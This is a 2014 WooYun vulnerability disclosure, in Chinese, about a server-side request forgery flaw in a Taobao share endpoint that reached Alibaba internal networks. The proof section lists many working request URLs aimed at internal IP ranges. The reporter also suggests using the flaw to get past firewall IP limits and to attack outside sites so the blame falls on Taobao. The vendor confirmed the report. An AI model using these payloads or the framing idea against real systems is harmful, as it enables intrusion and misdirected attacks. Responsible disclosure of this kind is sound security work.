[公开漏洞]内网编织者阿里巴巴集团各业务内网来回编织!

来源:WooYun 浏览:2400次 时间:2014-07-25
做网站找雨过天晴工作室
内网编织者阿里巴巴集团各业务内网来回编织! 相关厂商: 阿里巴巴 漏洞作者:路人甲 提交时间:2014-05-26 14:44 公开时间:2014-07-25 14:48 漏洞类型:设计缺陷/逻辑错误 危害等级:高 自评Rank:15 漏洞状态: 厂商已经确认 漏洞来源:http://www.wooyun.org Tags标签: 设计缺陷/边界绕过 设计不当 SSRF 内网编织 漏洞详情 披露状态:

2014-05-26:该漏洞正等待厂商内部评估
2014-05-26:厂商已经确认,与白帽子共同解决该漏洞中,漏洞信息仅向厂商公开
2014-06-05:细节向核心白帽子及相关领域专家公开
2014-06-15:细节向普通白帽子公开
2014-06-25:细节向实习白帽子公开
2014-07-25:细节向公众公开

简要描述:

RT!

详细说明:

听说有奖励,来试一下!

其实,是淘宝一个SSRF漏洞,但部分业务内网是打通的,能编制淘宝内网的同时也能编制阿里其他业务内网!



http://share.jianghu.taobao.com/share/addShare.htm?title=&url=http://www.wooyun.org





1.png





漏洞证明:

一下每个测试网段随机ip找一下应用,只测试http协议的80端口:

http://172.24.18.*

天猫:


...


http://share.jianghu.taobao.com/share/addShare.htm?title=&url=http://172.24.18.5


http://share.jianghu.taobao.com/share/addShare.htm?title=&url=http://172.24.18.49



...




http://172.24.22.*

http://share.jianghu.taobao.com/share/addShare.htm?title=&url=http://172.24.22.49


....


http://172.24.23.*

...

http://share.jianghu.taobao.com/share/addShare.htm?title=&url=http://172.24.23.139


http://share.jianghu.taobao.com/share/addShare.htm?title=&url=http://172.24.23.140


....

http://172.24.24.*

...

http://share.jianghu.taobao.com/share/addShare.htm?title=&url=http://172.24.24.1

...


http://172.24.32.1 *


...

http://share.jianghu.taobao.com/share/addShare.htm?title=&url=http://172.24.32.1

...

http://172.24.38.*

...

http://share.jianghu.taobao.com/share/addShare.htm?title=&url=http://172.24.38.30

...




http://share.jianghu.taobao.com/share/addShare.htm?title=&url=http://172.24.23.81:80




阿里云网段:

http://172.18.120.*

...

http://share.jianghu.taobao.com/share/addShare.htm?title=&url=http://172.18.120.112/uc/index.php

...

...

http://share.jianghu.taobao.com/share/addShare.htm?title=&url=http://10.135.252.144/xxx

...




Alimama:


...

http://share.jianghu.taobao.com/share/addShare.htm?title=&url=http://10.254.1.21

...



...


http://share.jianghu.taobao.com/share/addShare.htm?title=&url=http://10.254.2.64















1.png







2.png









4.png







5.png







6.png









7.png







8.png













9.png







10.png









另外,SSRF可以做很多事情,比如绕过外网应用的ip限制等(如:前端WAF)





1.png







1.png







SSRF就能访问了:





1.png







除了用exp打内网应用,我们还可以打外网,嫁祸给淘宝,说是淘宝干的,如:





1.png













下次有时间,一定把阿里内网应用结构编织出来,我想那一定很壮观!

修复方案:

内网请求转发到当前用户所在内网,这样才算最合理的设计之一?

版权声明:转载请注明来源 路人甲@乌云

漏洞回应 厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-05-26 14:53

厂商回复:

感谢您对阿里安全的支持!

最新状态:

暂无